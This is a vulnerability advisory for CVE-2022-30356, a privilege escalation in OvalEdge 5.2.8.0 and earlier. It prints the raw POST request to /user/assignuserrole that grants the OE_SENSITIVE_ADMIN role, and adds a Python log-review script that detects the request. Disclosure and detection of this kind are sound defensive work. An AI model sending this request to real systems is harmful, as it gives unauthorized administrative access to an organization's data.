# Privilege Escalation

## Privilege Escalation - OE\_ADMIN role can escalate privileges to any defined role (authenticated) <a href="#finding1" id="finding1"></a>

### CVE-2022-30356

#### OvalEdge 5.2.8.0 and earlier is affected by a Privilege Escalation vulnerability via a POST request to <mark style="color:red;">/user/assignuserrole</mark> using the <mark style="color:red;">userid</mark> and <mark style="color:red;">role</mark> parameters. Authentication with the OE\_ADMIN role is required.

{% hint style="warning" %}
**<https://example.com/ovaledge>**<mark style="color:red;">**/user/assignuserrole**</mark>
{% endhint %}

#### RAW Request

<details>

<summary>POST https://example.com/ovaledge<mark style="color:red;">/user/assignuserrole</mark> HTTP/1.1<br>Host: example.com<br>Connection: keep-alive<br>Content-Length: 47<br>sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>X-Requested-With: XMLHttpRequest<br>sec-ch-ua-mobile: ?0<br>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36<br>sec-ch-ua-platform: "macOS"<br>Origin: https://example.com<br>Sec-Fetch-Site: same-origin<br>Sec-Fetch-Mode: cors<br>Sec-Fetch-Dest: empty<br>Referer: https://example.com/ovaledge/<br>Accept-Encoding: gzip, deflate, br<br>Accept-Language: en-US,en;q=0.9<br>Cookie: oe-loc=en; JSESSIONID=<mark style="color:red;">OGQ4MmFkNzYtNThjNS00MjU2LTljNGMtMGMwZjdhYjllZTk2</mark><br><br><mark style="color:red;">userid</mark>=<mark style="color:red;">admin</mark>&#x26;<mark style="color:red;">role</mark>=<mark style="color:red;">OE_SENSITIVE_ADMIN</mark>&#x26;action=ADD</summary>

</details>
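
#### Detection example

The following is an added example, not part of the original advisory or of OvalEdge: a log review that flags the request shown above when it appears in a reverse-proxy or WAF log that captures request bodies. The log schema (`method`, `url`, `auth_user`, `body`), the sample records, and the `EXAMPLE_ROLE` name are constructed assumptions; the endpoint and the `OE_SENSITIVE_ADMIN` role come from the advisory.

```python
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/user/assignuserrole"         # path named in the advisory
SENSITIVE_ROLES = {"OE_SENSITIVE_ADMIN"}  # role from the advisory; extend per site

def review(record):
    """Return findings for one logged request; an empty list means nothing to flag."""
    if record["method"].upper() != "POST":
        return []
    if not urlsplit(record["url"]).path.rstrip("/").endswith(ENDPOINT):
        return []
    # parse_qs percent-decodes and keeps every value of a repeated parameter.
    form = parse_qs(record["body"], keep_blank_values=True)
    if "ADD" not in (a.strip().upper() for a in form.get("action", [])):
        return []
    users = [u.strip() for u in form.get("userid", [])]
    roles = [r.strip() for r in form.get("role", [])]
    findings = []
    for role in roles:
        if role.upper() in SENSITIVE_ROLES:
            findings.append(f"sensitive role {role} granted to {','.join(users)}")
    if record["auth_user"].lower() in (u.lower() for u in users):
        findings.append(f"{record['auth_user']} changed their own roles")
    return findings

# Constructed sample records (hypothetical log schema: method, url, auth_user, body).
SAMPLE_LOG = [
    {"method": "POST", "url": "https://example.com/ovaledge/user/assignuserrole",
     "auth_user": "admin", "body": "userid=admin&role=OE_SENSITIVE_ADMIN&action=ADD"},
    {"method": "POST", "url": "https://example.com/ovaledge/user/assignuserrole",
     "auth_user": "admin", "body": "userid=jdoe&role=OE%5FSENSITIVE%5FADMIN&action=ADD"},
    {"method": "POST", "url": "https://example.com/ovaledge/user/assignuserrole",
     "auth_user": "admin", "body": "userid=jdoe&role=EXAMPLE_ROLE&action=ADD"},
    {"method": "GET", "url": "https://example.com/ovaledge/", "auth_user": "jdoe", "body": ""},
]

def scan(log):
    """Map record index -> findings for every record that raised at least one."""
    return {i: f for i, rec in enumerate(log) if (f := review(rec))}

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```
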
